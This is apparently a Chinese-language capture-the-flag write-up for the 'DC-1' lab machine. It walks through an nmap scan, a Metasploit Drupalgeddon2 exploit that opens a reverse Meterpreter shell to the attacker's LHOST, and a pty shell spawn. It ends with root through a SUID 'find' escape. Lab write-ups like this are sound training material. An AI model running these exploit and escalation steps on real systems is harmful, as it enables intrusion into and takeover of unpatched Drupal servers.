HackMD
PG-DC-1
Step.1 掃描
先用nmap掃描
nmap -T4 192.168.111.193
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
Step.2 Exploit
發現網頁是Drupal Site,嘗試使用metasploit注入漏洞
msfconsole
msf6 > search drupal
發現有漏洞可以利用
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes
使用use指令使用漏洞
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
LHOST 設為自己本地的 hostname
RHOSTS 設為目標主機的 hostname
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.45.152
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.111.193
上面的指令也可以用小寫
LHOST->lhost,RHOSTS->rhosts
使用 exploit 或 run 開始利用漏洞
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started reverse TCP handler on 192.168.45.152:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.111.193
[*] Meterpreter session 1 opened (192.168.45.152:4444 -> 192.168.111.193:58932) at 2024-10-11 05:05:12 +0800
meterpreter >
local flag
看到 meterpreter 就代表成功注入了,使用 shell 指令開啟 shell
一樣使用 pty shell
python -c 'import pty;pty.spawn("/bin/bash")'
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
root flag
使用 find 指令尋找具有 SUID 的文件
find / -perm /4000 2>/dev/null
發現有 find 這個指令
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
到GTFObins尋找可使用的 shell
find . -exec /bin/sh \; -quit
成功取得 root 的權限
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
